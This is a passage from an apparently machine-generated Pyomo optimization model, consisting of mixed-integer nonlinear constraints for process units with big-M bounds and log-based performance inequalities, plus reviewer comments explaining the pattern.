Constraint(expr= m.x1183 == 0) m.c1658 = Constraint(expr= m.x1214 == 0) m.c1659 = Constraint(expr= m.x1215 == 0) m.c1660 = Constraint(expr= m.x1216 == 0) m.c1661 = Constraint(expr= m.x941 - m.x1178 - m.x1181 == 0) m.c1662 = Constraint(expr= m.x942 - m.x1179 - m.x1182 == 0) 
m.c1663 = Constraint(expr= m.x943 - m.x1180 - m.x1183 == 0) m.c1664 = Constraint(expr= m.x956 - m.x1208 - m.x1214 == 0) m.c1665 = Constraint(expr= m.x957 - m.x1209 - m.x1215 == 0) m.c1666 = Constraint(expr= m.x958 - m.x1210 - m.x1216 == 0) m.c1667 = Constraint(expr= m.x1178 - 3.34221486003388*m.b1505 <= 0) m.c1668 = Constraint(expr= m.x1179 - 3.34221486003388*m.b1506 <= 0) m.c1669 = Constraint(expr= m.x1180 - 3.34221486003388*m.b1507 <= 0) m.c1670 = Constraint(expr= m.x1181 + 3.34221486003388*m.b1505 <= 3.34221486003388) m.c1671 = Constraint(expr= m.x1182 + 3.34221486003388*m.b1506 <= 3.34221486003388) m.c1672 = Constraint(expr= m.x1183 + 3.34221486003388*m.b1507 <= 3.34221486003388) m.c1673 = Constraint(expr= m.x1208 - 1.83548069293539*m.b1505 <= 0) m.c1674 = Constraint(expr= m.x1209 - 1.83548069293539*m.b1506 <= 0) m.c1675 = Constraint(expr= m.x1210 - 1.83548069293539*m.b1507 <= 0) m.c1676 = Constraint(expr= m.x1214 + 1.83548069293539*m.b1505 <= 1.83548069293539) m.c1677 = Constraint(expr= m.x1215 + 1.83548069293539*m.b1506 <= 1.83548069293539) m.c1678 = Constraint(expr= m.x1216 + 1.83548069293539*m.b1507 <= 1.83548069293539) m.c1679 = Constraint(expr=(m.x1220/(0.001 + 0.999*m.b1508) - 0.9*log(1 + m.x1184/(0.001 + 0.999*m.b1508)))*(0.001 + 0.999*m.b1508) <= 0) m.c1680 = Constraint(expr=(m.x1221/(0.001 + 0.999*m.b1509) - 0.9*log(1 + m.x1185/(0.001 + 0.999*m.b1509)))*(0.001 + 0.999*m.b1509) <= 0) m.c1681 = Constraint(expr=(m.x1222/(0.001 + 0.999*m.b1510) - 0.9*log(1 + m.x1186/(0.001 + 0.999*m.b1510)))*(0.001 + 0.999*m.b1510) <= 0) m.c1682 = Constraint(expr= m.x1187 == 0) m.c1683 = Constraint(expr= m.x1188 == 0) m.c1684 = Constraint(expr= m.x1189 == 0) m.c1685 = Constraint(expr= m.x1226 == 0) m.c1686 = Constraint(expr= m.x1227 == 0) m.c1687 = Constraint(expr= m.x1228 == 0) m.c1688 = Constraint(expr= m.x944 - m.x1184 - m.x1187 == 0) m.c1689 = Constraint(expr= m.x945 - m.x1185 - m.x1188 == 0) m.c1690 = Constraint(expr= m.x946 - m.x1186 - m.x1189 == 0) m.c1691 = 
Constraint(expr= m.x959 - m.x1220 - m.x1226 == 0) m.c1692 = Constraint(expr= m.x960 - m.x1221 - m.x1227 == 0) m.c1693 = Constraint(expr= m.x961 - m.x1222 - m.x1228 == 0) m.c1694 = Constraint(expr= m.x1184 - 3.34221486003388*m.b1508 <= 0) m.c1695 = Constraint(expr= m.x1185 - 3.34221486003388*m.b1509 <= 0) m.c1696 = Constraint(expr= m.x1186 - 3.34221486003388*m.b1510 <= 0) m.c1697 = Constraint(expr= m.x1187 + 3.34221486003388*m.b1508 <= 3.34221486003388) m.c1698 = Constraint(expr= m.x1188 + 3.34221486003388*m.b1509 <= 3.34221486003388) m.c1699 = Constraint(expr= m.x1189 + 3.34221486003388*m.b1510 <= 3.34221486003388) m.c1700 = Constraint(expr= m.x1220 - 1.32154609891348*m.b1508 <= 0) m.c1701 = Constraint(expr= m.x1221 - 1.32154609891348*m.b1509 <= 0) m.c1702 = Constraint(expr= m.x1222 - 1.32154609891348*m.b1510 <= 0) m.c1703 = Constraint(expr= m.x1226 + 1.32154609891348*m.b1508 <= 1.32154609891348) m.c1704 = Constraint(expr= m.x1227 + 1.32154609891348*m.b1509 <= 1.32154609891348) m.c1705 = Constraint(expr= m.x1228 + 1.32154609891348*m.b1510 <= 1.32154609891348) m.c1706 = Constraint(expr=(m.x1232/(0.001 + 0.999*m.b1511) - log(1 + m.x1163/(0.001 + 0.999*m.b1511)))*(0.001 + 0.999* m.b1511) <= 0) m.c1707 = Constraint(expr=(m.x1233/(0.001 + 0.999*m.b1512) - log(1 + m.x1164/(0.001 + 0.999*m.b1512)))*(0.001 + 0.999* m.b1512) <= 0) m.c1708 = Constraint(expr=(m.x1234/(0.001 + 0.999*m.b1513) - log(1 + m.x1165/(0.001 + 0.999*m.b1513)))*(0.001 + 0.999* m.b1513) <= 0) m.c1709 = Constraint(expr= m.x1169 == 0) m.c1710 = Constraint(expr= m.x1170 == 0) m.c1711 = Constraint(expr= m.x1171 == 0) m.c1712 = Constraint(expr= m.x1235 == 0) m.c1713 = Constraint(expr= m.x1236 == 0) m.c1714 = Constraint(expr= m.x1237 == 0) m.c1715 = Constraint(expr= m.x935 - m.x1163 - m.x1169 == 0) m.c1716 = Constraint(expr= m.x936 - m.x1164 - m.x1170 == 0) m.c1717 = Constraint(expr= m.x937 - m.x1165 - m.x1171 == 0) m.c1718 = Constraint(expr= m.x962 - m.x1232 - m.x1235 == 0) m.c1719 = Constraint(expr= m.x963 - 
m.x1233 - m.x1236 == 0) m.c1720 = Constraint(expr= m.x964 - m.x1234 - m.x1237 == 0) m.c1721 = Constraint(expr= m.x1163 - 2.54515263975353*m.b1511 <= 0) m.c1722 = Constraint(expr= m.x1164 - 2.54515263975353*m.b1512 <= 0) m.c1723 = Constraint(expr= m.x1165 - 2.54515263975353*m.b1513 <= 0) m.c1724 = Constraint(expr= m.x1169 + 2.54515263975353*m.b1511 <= 2.54515263975353) m.c1725 = Constraint(expr= m.x1170 + 2.54515263975353*m.b1512 <= 2.54515263975353) m.c1726 = Constraint(expr= m.x1171 + 2.54515263975353*m.b1513 <= 2.54515263975353) m.c1727 = Constraint(expr= m.x1232 - 1.26558121681553*m.b1511 <= 0) m.c1728 = Constraint(expr= m.x1233 - 1.26558121681553*m.b1512 <= 0) m.c1729 = Constraint(expr= m.x1234 - 1.26558121681553*m.b1513 <= 0) m.c1730 = Constraint(expr= m.x1235 + 1.26558121681553*m.b1511 <= 1.26558121681553) m.c1731 = Constraint(expr= m.x1236 + 1.26558121681553*m.b1512 <= 1.26558121681553) m.c1732 = Constraint(expr= m.x1237 + 1.26558121681553*m.b1513 <= 1.26558121681553) m.c1733 = Constraint(expr= - 0.9*m.x1190 + m.x1238 == 0) m.c1734 = Constraint(expr= - 0.9*m.x1191 + m.x1239 == 0) m.c1735 = Constraint(expr= - 0.9*m.x1192 + m.x1240 == 0) m.c1736 = Constraint(expr= m.x1193 == 0) m.c1737 = Constraint(expr= m.x1194 == 0) m.c1738 = Constraint(expr= m.x1195 == 0) m.c1739 = Constraint(expr= m.x1241 == 0) m.c1740 = Constraint(expr= m.x1242 == 0) m.c1741 = Constraint(expr= m.x1243 == 0) m.c1742 = Constraint(expr= m.x947 - m.x1190 - m.x1193 == 0) m.c1743 = Constraint(expr= m.x948 - m.x1191 - m.x1194 == 0) m.c1744 = Constraint(expr= m.x949 - m.x1192 - m.x1195 == 0) m.c1745 = Constraint(expr= m.x965 - m.x1238 - m.x1241 == 0) m.c1746 = Constraint(expr= m.x966 - m.x1239 - m.x1242 == 0) m.c1747 = Constraint(expr= m.x967 - m.x1240 - m.x1243 == 0) m.c1748 = Constraint(expr= m.x1190 - 15*m.b1514 <= 0) m.c1749 = Constraint(expr= m.x1191 - 15*m.b1515 <= 0) m.c1750 = Constraint(expr= m.x1192 - 15*m.b1516 <= 0) m.c1751 = Constraint(expr= m.x1193 + 15*m.b1514 <= 15) m.c1752 = 
Constraint(expr= m.x1194 + 15*m.b1515 <= 15) m.c1753 = Constraint(expr= m.x1195 + 15*m.b1516 <= 15) m.c1754 = Constraint(expr= m.x1238 - 13.5*m.b1514 <= 0) m.c1755 = Constraint(expr= m.x1239 - 13.5*m.b1515 <= 0) m.c1756 = Constraint(expr= m.x1240 - 13.5*m.b1516 <= 0) m.c1757 = Constraint(expr= m.x1241 + 13.5*m.b1514 <= 13.5) m.c1758 = Constraint(expr= m.x1242 + 13.5*m.b1515 <= 13.5) m.c1759 = Constraint(expr= m.x1243 + 13.5*m.b1516 <= 13.5) m.c1760 = Constraint(expr= - 0.6*m.x1196 + m.x1244 == 0) m.c1761 = Constraint(expr= - 0.6*m.x1197 + m.x1245 == 0) m.c1762 = Constraint(expr= - 0.6*m.x1198 + m.x1246 == 0) m.c1763 = Constraint(expr= m.x1199 == 0) m.c1764 = Constraint(expr= m.x1200 == 0) m.c1765 = Constraint(expr= m.x1201 == 0) m.c1766 = Constraint(expr= m.x1247 == 0) m.c1767 = Constraint(expr= m.x1248 == 0) m.c1768 = Constraint(expr= m.x1249 == 0) m.c1769 = Constraint(expr= m.x950 - m.x1196 - m.x1199 == 0) m.c1770 = Constraint(expr= m.x951 - m.x1197 - m.x1200 == 0) m.c1771 = Constraint(expr= m.x952 - m.x1198 - m.x1201 == 0) m.c1772 = Constraint(expr= m.x968 - m.x1244 - m.x1247 == 0) m.c1773 = Constraint(expr= m.x969 - m.x1245 - m.x1248 == 0) m.c1774 = Constraint(expr= m.x970 - m.x1246 - m.x1249 == 0) m.c1775 = Constraint(expr= m.x1196 - 15*m.b1517 <= 0) m.c1776 = Constraint(expr= m.x1197 - 15*m.b1518 <= 0) m.c1777 = Constraint(expr= m.x1198 - 15*m.b1519 <= 0) m.c1778 = Constraint(expr= m.x1199 + 15*m.b1517 <= 15) m.c1779 = Constraint(expr= m.x1200 + 15*m.b1518 <= 15) m.c1780 = Constraint(expr= m.x1201 + 15*m.b1519 <= 15) m.c1781 = Constraint(expr= m.x1244 - 9*m.b1517 <= 0) m.c1782 = Constraint(expr= m.x1245 - 9*m.b1518 <= 0) m.c1783 = Constraint(expr= m.x1246 - 9*m.b1519 <= 0) m.c1784 = Constraint(expr= m.x1247 + 9*m.b1517 <= 9) m.c1785 = Constraint(expr= m.x1248 + 9*m.b1518 <= 9) m.c1786 = Constraint(expr= m.x1249 + 9*m.b1519 <= 9) m.c1787 = Constraint(expr=(m.x1250/(0.001 + 0.999*m.b1520) - 1.1*log(1 + m.x1202/(0.001 + 0.999*m.b1520)))*(0.001 + 0.999*m.b1520) 
<= 0) m.c1788 = Constraint(expr=(m.x1251/(0.001 + 0.999*m.b1521) - 1.1*log(1 + m.x1203/(0.001 + 0.999*m.b1521)))*(0.001 + 0.999*m.b1521) <= 0) m.c1789 = Constraint(expr=(m.x1252/(0.001 + 0.999*m.b1522) - 1.1*log(1 + m.x1204/(0.001 + 0.999*m.b1522)))*(0.001 + 0.999*m.b1522) <= 0) m.c1790 = Constraint(expr= m.x1205 == 0) m.c1791 = Constraint(expr= m.x1206 == 0) m.c1792 = Constraint(expr= m.x1207 == 0) m.c1793 = Constraint(expr= m.x1253 == 0) m.c1794 = Constraint(expr= m.x1254 == 0) m.c1795 = Constraint(expr= m.x1255 == 0) m.c1796 = Constraint(expr= m.x953 - m.x1202 - m.x1205 == 0) m.c1797 = Constraint(expr= m.x954 - m.x1203 - m.x1206 == 0) m.c1798 = Constraint(expr= m.x955 - m.x1204 - m.x1207 == 0) m.c1799 = Constraint(expr= m.x971 - m.x1250 - m.x1253 == 0) m.c1800 = Constraint(expr= m.x972 - m.x1251 - m.x1254 == 0) m.c1801 = Constraint(expr= m.x973 - m.x1252 - m.x1255 == 0) m.c1802 = Constraint(expr= m.x1202 - 15*m.b1520 <= 0) m.c1803 = Constraint(expr= m.x1203 - 15*m.b1521 <= 0) m.c1804 = Constraint(expr= m.x1204 - 15*m.b1522 <= 0) m.c1805 = Constraint(expr= m.x1205 + 15*m.b1520 <= 15) m.c1806 = Constraint(expr= m.x1206 + 15*m.b1521 <= 15) m.c1807 = Constraint(expr= m.x1207 + 15*m.b1522 <= 15) m.c1808 = Constraint(expr= m.x1250 - 3.04984759446376*m.b1520 <= 0) m.c1809 = Constraint(expr= m.x1251 - 3.04984759446376*m.b1521 <= 0) m.c1810 = Constraint(expr= m.x1252 - 3.04984759446376*m.b1522 <= 0) m.c1811 = Constraint(expr= m.x1253 + 3.04984759446376*m.b1520 <= 3.04984759446376) m.c1812 = Constraint(expr= m.x1254 + 3.04984759446376*m.b1521 <= 3.04984759446376) m.c1813 = Constraint(expr= m.x1255 + 3.04984759446376*m.b1522 <= 3.04984759446376) m.c1814 = Constraint(expr= - 0.9*m.x1211 + m.x1310 == 0) m.c1815 = Constraint(expr= - 0.9*m.x1212 + m.x1311 == 0) m.c1816 = Constraint(expr= - 0.9*m.x1213 + m.x1312 == 0) m.c1817 = Constraint(expr= - m.x1268 + m.x1310 == 0) m.c1818 = Constraint(expr= - m.x1269 + m.x1311 == 0) m.c1819 = Constraint(expr= - m.x1270 + m.x1312 == 0) 
# NOTE(review): this file is machine-generated ("MINLP written by GAMS Convert",
# see the file header).  Do not hand-edit the model logic -- regenerate from the
# GAMS source instead.  The comments below only annotate the generated
# structure; every constraint token is unchanged (statements reflowed one per
# line).
#
# Recurring pattern in this section (appears to be the standard big-M /
# on-off linearization that GAMS Convert emits for disjunctive process units --
# TODO confirm against the original GAMS model):
#   * "x == 0"                          : variables fixed to zero on one branch
#   * "x - U*b <= 0" / "s + U*b <= U"   : upper bound U active only when the
#                                         binary b selects the unit (and the
#                                         complementary slack s is forced to 0)
#   * "xin - x - s == 0"                : split of a stream into active/inactive
#                                         parts
#   * "(y/(0.001+0.999*b) - k*log(1 + x/(0.001+0.999*b)))*(0.001+0.999*b) <= 0"
#                                         : scaled nonlinear (log) performance
#                                         inequality, smoothed with the 0.001
#                                         perturbation so it degenerates
#                                         gracefully when b = 0
m.c1820 = Constraint(expr= m.x1217 == 0)
m.c1821 = Constraint(expr= m.x1218 == 0)
m.c1822 = Constraint(expr= m.x1219 == 0)
m.c1823 = Constraint(expr= m.x1271 == 0)
m.c1824 = Constraint(expr= m.x1272 == 0)
m.c1825 = Constraint(expr= m.x1273 == 0)
m.c1826 = Constraint(expr= m.x1313 == 0)
m.c1827 = Constraint(expr= m.x1314 == 0)
m.c1828 = Constraint(expr= m.x1315 == 0)
# stream splits (input - active part - inactive part == 0)
m.c1829 = Constraint(expr= m.x956 - m.x1211 - m.x1217 == 0)
m.c1830 = Constraint(expr= m.x957 - m.x1212 - m.x1218 == 0)
m.c1831 = Constraint(expr= m.x958 - m.x1213 - m.x1219 == 0)
m.c1832 = Constraint(expr= m.x980 - m.x1268 - m.x1271 == 0)
m.c1833 = Constraint(expr= m.x981 - m.x1269 - m.x1272 == 0)
m.c1834 = Constraint(expr= m.x982 - m.x1270 - m.x1273 == 0)
m.c1835 = Constraint(expr= m.x1004 - m.x1310 - m.x1313 == 0)
m.c1836 = Constraint(expr= m.x1005 - m.x1311 - m.x1314 == 0)
m.c1837 = Constraint(expr= m.x1006 - m.x1312 - m.x1315 == 0)
# big-M bound pairs keyed to binaries b1523..b1525
m.c1838 = Constraint(expr= m.x1211 - 1.83548069293539*m.b1523 <= 0)
m.c1839 = Constraint(expr= m.x1212 - 1.83548069293539*m.b1524 <= 0)
m.c1840 = Constraint(expr= m.x1213 - 1.83548069293539*m.b1525 <= 0)
m.c1841 = Constraint(expr= m.x1217 + 1.83548069293539*m.b1523 <= 1.83548069293539)
m.c1842 = Constraint(expr= m.x1218 + 1.83548069293539*m.b1524 <= 1.83548069293539)
m.c1843 = Constraint(expr= m.x1219 + 1.83548069293539*m.b1525 <= 1.83548069293539)
m.c1844 = Constraint(expr= m.x1268 - 20*m.b1523 <= 0)
m.c1845 = Constraint(expr= m.x1269 - 20*m.b1524 <= 0)
m.c1846 = Constraint(expr= m.x1270 - 20*m.b1525 <= 0)
m.c1847 = Constraint(expr= m.x1271 + 20*m.b1523 <= 20)
m.c1848 = Constraint(expr= m.x1272 + 20*m.b1524 <= 20)
m.c1849 = Constraint(expr= m.x1273 + 20*m.b1525 <= 20)
m.c1850 = Constraint(expr= m.x1310 - 20*m.b1523 <= 0)
m.c1851 = Constraint(expr= m.x1311 - 20*m.b1524 <= 0)
m.c1852 = Constraint(expr= m.x1312 - 20*m.b1525 <= 0)
m.c1853 = Constraint(expr= m.x1313 + 20*m.b1523 <= 20)
m.c1854 = Constraint(expr= m.x1314 + 20*m.b1524 <= 20)
m.c1855 = Constraint(expr= m.x1315 + 20*m.b1525 <= 20)
# nonlinear (log) performance inequalities for the unit gated by b1526..b1528
m.c1856 = Constraint(expr=(m.x1316/(0.001 + 0.999*m.b1526) - log(1 + m.x1223/(0.001 + 0.999*m.b1526)))*(0.001 + 0.999*m.b1526) <= 0)
m.c1857 = Constraint(expr=(m.x1317/(0.001 + 0.999*m.b1527) - log(1 + m.x1224/(0.001 + 0.999*m.b1527)))*(0.001 + 0.999*m.b1527) <= 0)
m.c1858 = Constraint(expr=(m.x1318/(0.001 + 0.999*m.b1528) - log(1 + m.x1225/(0.001 + 0.999*m.b1528)))*(0.001 + 0.999*m.b1528) <= 0)
m.c1859 = Constraint(expr= m.x1229 == 0)
m.c1860 = Constraint(expr= m.x1230 == 0)
m.c1861 = Constraint(expr= m.x1231 == 0)
m.c1862 = Constraint(expr= m.x1319 == 0)
m.c1863 = Constraint(expr= m.x1320 == 0)
m.c1864 = Constraint(expr= m.x1321 == 0)
m.c1865 = Constraint(expr= m.x959 - m.x1223 - m.x1229 == 0)
m.c1866 = Constraint(expr= m.x960 - m.x1224 - m.x1230 == 0)
m.c1867 = Constraint(expr= m.x961 - m.x1225 - m.x1231 == 0)
m.c1868 = Constraint(expr= m.x1007 - m.x1316 - m.x1319 == 0)
m.c1869 = Constraint(expr= m.x1008 - m.x1317 - m.x1320 == 0)
m.c1870 = Constraint(expr= m.x1009 - m.x1318 - m.x1321 == 0)
m.c1871 = Constraint(expr= m.x1223 - 1.32154609891348*m.b1526 <= 0)
m.c1872 = Constraint(expr= m.x1224 - 1.32154609891348*m.b1527 <= 0)
m.c1873 = Constraint(expr= m.x1225 - 1.32154609891348*m.b1528 <= 0)
m.c1874 = Constraint(expr= m.x1229 + 1.32154609891348*m.b1526 <= 1.32154609891348)
m.c1875 = Constraint(expr= m.x1230 + 1.32154609891348*m.b1527 <= 1.32154609891348)
m.c1876 = Constraint(expr= m.x1231 + 1.32154609891348*m.b1528 <= 1.32154609891348)
m.c1877 = Constraint(expr= m.x1316 - 0.842233385663186*m.b1526 <= 0)
m.c1878 = Constraint(expr= m.x1317 - 0.842233385663186*m.b1527 <= 0)
m.c1879 = Constraint(expr= m.x1318 - 0.842233385663186*m.b1528 <= 0)
m.c1880 = Constraint(expr= m.x1319 + 0.842233385663186*m.b1526 <= 0.842233385663186)
m.c1881 = Constraint(expr= m.x1320 + 0.842233385663186*m.b1527 <= 0.842233385663186)
m.c1882 = Constraint(expr= m.x1321 + 0.842233385663186*m.b1528 <= 0.842233385663186)
# unit gated by b1529..b1531 (conversion factor 0.7 in the log term)
m.c1883 = Constraint(expr=(m.x1322/(0.001 + 0.999*m.b1529) - 0.7*log(1 + m.x1256/(0.001 + 0.999*m.b1529)))*(0.001 + 0.999*m.b1529) <= 0)
m.c1884 = Constraint(expr=(m.x1323/(0.001 + 0.999*m.b1530) - 0.7*log(1 + m.x1257/(0.001 + 0.999*m.b1530)))*(0.001 + 0.999*m.b1530) <= 0)
m.c1885 = Constraint(expr=(m.x1324/(0.001 + 0.999*m.b1531) - 0.7*log(1 + m.x1258/(0.001 + 0.999*m.b1531)))*(0.001 + 0.999*m.b1531) <= 0)
m.c1886 = Constraint(expr= m.x1259 == 0)
m.c1887 = Constraint(expr= m.x1260 == 0)
m.c1888 = Constraint(expr= m.x1261 == 0)
m.c1889 = Constraint(expr= m.x1325 == 0)
m.c1890 = Constraint(expr= m.x1326 == 0)
m.c1891 = Constraint(expr= m.x1327 == 0)
m.c1892 = Constraint(expr= m.x974 - m.x1256 - m.x1259 == 0)
m.c1893 = Constraint(expr= m.x975 - m.x1257 - m.x1260 == 0)
m.c1894 = Constraint(expr= m.x976 - m.x1258 - m.x1261 == 0)
m.c1895 = Constraint(expr= m.x1010 - m.x1322 - m.x1325 == 0)
m.c1896 = Constraint(expr= m.x1011 - m.x1323 - m.x1326 == 0)
m.c1897 = Constraint(expr= m.x1012 - m.x1324 - m.x1327 == 0)
m.c1898 = Constraint(expr= m.x1256 - 1.26558121681553*m.b1529 <= 0)
m.c1899 = Constraint(expr= m.x1257 - 1.26558121681553*m.b1530 <= 0)
m.c1900 = Constraint(expr= m.x1258 - 1.26558121681553*m.b1531 <= 0)
m.c1901 = Constraint(expr= m.x1259 + 1.26558121681553*m.b1529 <= 1.26558121681553)
m.c1902 = Constraint(expr= m.x1260 + 1.26558121681553*m.b1530 <= 1.26558121681553)
m.c1903 = Constraint(expr= m.x1261 + 1.26558121681553*m.b1531 <= 1.26558121681553)
m.c1904 = Constraint(expr= m.x1322 - 0.572481933717686*m.b1529 <= 0)
m.c1905 = Constraint(expr= m.x1323 - 0.572481933717686*m.b1530 <= 0)
m.c1906 = Constraint(expr= m.x1324 - 0.572481933717686*m.b1531 <= 0)
m.c1907 = Constraint(expr= m.x1325 + 0.572481933717686*m.b1529 <= 0.572481933717686)
m.c1908 = Constraint(expr= m.x1326 + 0.572481933717686*m.b1530 <= 0.572481933717686)
m.c1909 = Constraint(expr= m.x1327 + 0.572481933717686*m.b1531 <= 0.572481933717686)
# unit gated by b1532..b1534: two feed streams share one log-output cap (0.65)
m.c1910 = Constraint(expr=(m.x1328/(0.001 + 0.999*m.b1532) - 0.65*log(1 + m.x1262/(0.001 + 0.999*m.b1532)))*(0.001 + 0.999*m.b1532) <= 0)
m.c1911 = Constraint(expr=(m.x1329/(0.001 + 0.999*m.b1533) - 0.65*log(1 + m.x1263/(0.001 + 0.999*m.b1533)))*(0.001 + 0.999*m.b1533) <= 0)
m.c1912 = Constraint(expr=(m.x1330/(0.001 + 0.999*m.b1534) - 0.65*log(1 + m.x1264/(0.001 + 0.999*m.b1534)))*(0.001 + 0.999*m.b1534) <= 0)
m.c1913 = Constraint(expr=(m.x1328/(0.001 + 0.999*m.b1532) - 0.65*log(1 + m.x1274/(0.001 + 0.999*m.b1532)))*(0.001 + 0.999*m.b1532) <= 0)
m.c1914 = Constraint(expr=(m.x1329/(0.001 + 0.999*m.b1533) - 0.65*log(1 + m.x1275/(0.001 + 0.999*m.b1533)))*(0.001 + 0.999*m.b1533) <= 0)
m.c1915 = Constraint(expr=(m.x1330/(0.001 + 0.999*m.b1534) - 0.65*log(1 + m.x1276/(0.001 + 0.999*m.b1534)))*(0.001 + 0.999*m.b1534) <= 0)
m.c1916 = Constraint(expr= m.x1265 == 0)
m.c1917 = Constraint(expr= m.x1266 == 0)
m.c1918 = Constraint(expr= m.x1267 == 0)
m.c1919 = Constraint(expr= m.x1277 == 0)
m.c1920 = Constraint(expr= m.x1278 == 0)
m.c1921 = Constraint(expr= m.x1279 == 0)
m.c1922 = Constraint(expr= m.x1331 == 0)
m.c1923 = Constraint(expr= m.x1332 == 0)
m.c1924 = Constraint(expr= m.x1333 == 0)
m.c1925 = Constraint(expr= m.x977 - m.x1262 - m.x1265 == 0)
m.c1926 = Constraint(expr= m.x978 - m.x1263 - m.x1266 == 0)
m.c1927 = Constraint(expr= m.x979 - m.x1264 - m.x1267 == 0)
m.c1928 = Constraint(expr= m.x986 - m.x1274 - m.x1277 == 0)
m.c1929 = Constraint(expr= m.x987 - m.x1275 - m.x1278 == 0)
m.c1930 = Constraint(expr= m.x988 - m.x1276 - m.x1279 == 0)
m.c1931 = Constraint(expr= m.x1013 - m.x1328 - m.x1331 == 0)
m.c1932 = Constraint(expr= m.x1014 - m.x1329 - m.x1332 == 0)
m.c1933 = Constraint(expr= m.x1015 - m.x1330 - m.x1333 == 0)
m.c1934 = Constraint(expr= m.x1262 - 1.26558121681553*m.b1532 <= 0)
m.c1935 = Constraint(expr= m.x1263 - 1.26558121681553*m.b1533 <= 0)
m.c1936 = Constraint(expr= m.x1264 - 1.26558121681553*m.b1534 <= 0)
m.c1937 = Constraint(expr= m.x1265 + 1.26558121681553*m.b1532 <= 1.26558121681553)
m.c1938 = Constraint(expr= m.x1266 + 1.26558121681553*m.b1533 <= 1.26558121681553)
m.c1939 = Constraint(expr= m.x1267 + 1.26558121681553*m.b1534 <= 1.26558121681553)
m.c1940 = Constraint(expr= m.x1274 - 33.5*m.b1532 <= 0)
m.c1941 = Constraint(expr= m.x1275 - 33.5*m.b1533 <= 0)
m.c1942 = Constraint(expr= m.x1276 - 33.5*m.b1534 <= 0)
m.c1943 = Constraint(expr= m.x1277 + 33.5*m.b1532 <= 33.5)
m.c1944 = Constraint(expr= m.x1278 + 33.5*m.b1533 <= 33.5)
m.c1945 = Constraint(expr= m.x1279 + 33.5*m.b1534 <= 33.5)
m.c1946 = Constraint(expr= m.x1328 - 2.30162356062425*m.b1532 <= 0)
m.c1947 = Constraint(expr= m.x1329 - 2.30162356062425*m.b1533 <= 0)
m.c1948 = Constraint(expr= m.x1330 - 2.30162356062425*m.b1534 <= 0)
m.c1949 = Constraint(expr= m.x1331 + 2.30162356062425*m.b1532 <= 2.30162356062425)
m.c1950 = Constraint(expr= m.x1332 + 2.30162356062425*m.b1533 <= 2.30162356062425)
m.c1951 = Constraint(expr= m.x1333 + 2.30162356062425*m.b1534 <= 2.30162356062425)
# linear pass-through unit gated by b1535..b1537 (output == input, bound 9)
m.c1952 = Constraint(expr= - m.x1280 + m.x1334 == 0)
m.c1953 = Constraint(expr= - m.x1281 + m.x1335 == 0)
m.c1954 = Constraint(expr= - m.x1282 + m.x1336 == 0)
m.c1955 = Constraint(expr= m.x1283 == 0)
m.c1956 = Constraint(expr= m.x1284 == 0)
m.c1957 = Constraint(expr= m.x1285 == 0)
m.c1958 = Constraint(expr= m.x1337 == 0)
m.c1959 = Constraint(expr= m.x1338 == 0)
m.c1960 = Constraint(expr= m.x1339 == 0)
m.c1961 = Constraint(expr= m.x989 - m.x1280 - m.x1283 == 0)
m.c1962 = Constraint(expr= m.x990 - m.x1281 - m.x1284 == 0)
m.c1963 = Constraint(expr= m.x991 - m.x1282 - m.x1285 == 0)
m.c1964 = Constraint(expr= m.x1016 - m.x1334 - m.x1337 == 0)
m.c1965 = Constraint(expr= m.x1017 - m.x1335 - m.x1338 == 0)
m.c1966 = Constraint(expr= m.x1018 - m.x1336 - m.x1339 == 0)
m.c1967 = Constraint(expr= m.x1280 - 9*m.b1535 <= 0)
m.c1968 = Constraint(expr= m.x1281 - 9*m.b1536 <= 0)
m.c1969 = Constraint(expr= m.x1282 - 9*m.b1537 <= 0)
m.c1970 = Constraint(expr= m.x1283 + 9*m.b1535 <= 9)
m.c1971 = Constraint(expr= m.x1284 + 9*m.b1536 <= 9)
m.c1972 = Constraint(expr= m.x1285 + 9*m.b1537 <= 9)
m.c1973 = Constraint(expr= m.x1334 - 9*m.b1535 <= 0)
m.c1974 = Constraint(expr= m.x1335 - 9*m.b1536 <= 0)
m.c1975 = Constraint(expr= m.x1336 - 9*m.b1537 <= 0)
m.c1976 = Constraint(expr= m.x1337 + 9*m.b1535 <= 9)
m.c1977 = Constraint(expr= m.x1338 + 9*m.b1536 <= 9)
m.c1978 = Constraint(expr= m.x1339 + 9*m.b1537 <= 9)
# linear pass-through unit gated by b1538..b1540 (same shape as above)
m.c1979 = Constraint(expr= - m.x1286 + m.x1340 == 0)
m.c1980 = Constraint(expr= - m.x1287 + m.x1341 == 0)
m.c1981 = Constraint(expr= - m.x1288 + m.x1342 == 0)
m.c1982 = Constraint(expr= m.x1289 == 0)
m.c1983 = Constraint(expr= m.x1290 == 0)
m.c1984 = Constraint(expr= m.x1291 == 0)
m.c1985 = Constraint(expr= m.x1343 == 0)
m.c1986 = Constraint(expr= m.x1344 == 0)
m.c1987 = Constraint(expr= m.x1345 == 0)
m.c1988 = Constraint(expr= m.x992 - m.x1286 - m.x1289 == 0)
m.c1989 = Constraint(expr= m.x993 - m.x1287 - m.x1290 == 0)
m.c1990 = Constraint(expr= m.x994 - m.x1288 - m.x1291 == 0)
m.c1991 = Constraint(expr= m.x1019 - m.x1340 - m.x1343 == 0)
m.c1992 = Constraint(expr= m.x1020 - m.x1341 - m.x1344 == 0)
m.c1993 = Constraint(expr= m.x1021 - m.x1342 - m.x1345 == 0)
m.c1994 = Constraint(expr= m.x1286 - 9*m.b1538 <= 0)
m.c1995 = Constraint(expr= m.x1287 - 9*m.b1539 <= 0)
m.c1996 = Constraint(expr= m.x1288 - 9*m.b1540 <= 0)
m.c1997 = Constraint(expr= m.x1289 + 9*m.b1538 <= 9)
m.c1998 = Constraint(expr= m.x1290 + 9*m.b1539 <= 9)
m.c1999 = Constraint(expr= m.x1291 + 9*m.b1540 <= 9)
m.c2000 = Constraint(expr= m.x1340 - 9*m.b1538 <= 0)
m.c2001 = Constraint(expr= m.x1341 - 9*m.b1539 <= 0)
m.c2002 = Constraint(expr= m.x1342 - 9*m.b1540 <= 0)
m.c2003 = Constraint(expr= m.x1343 + 9*m.b1538 <= 9)
m.c2004 = Constraint(expr= m.x1344 + 9*m.b1539 <= 9)
m.c2005 = Constraint(expr= m.x1345 + 9*m.b1540 <= 9)
# unit gated by b1541..b1543 (conversion factor 0.75)
m.c2006 = Constraint(expr=(m.x1346/(0.001 + 0.999*m.b1541) - 0.75*log(1 + m.x1292/(0.001 + 0.999*m.b1541)))*(0.001 + 0.999*m.b1541) <= 0)
m.c2007 = Constraint(expr=(m.x1347/(0.001 + 0.999*m.b1542) - 0.75*log(1 + m.x1293/(0.001 + 0.999*m.b1542)))*(0.001 + 0.999*m.b1542) <= 0)
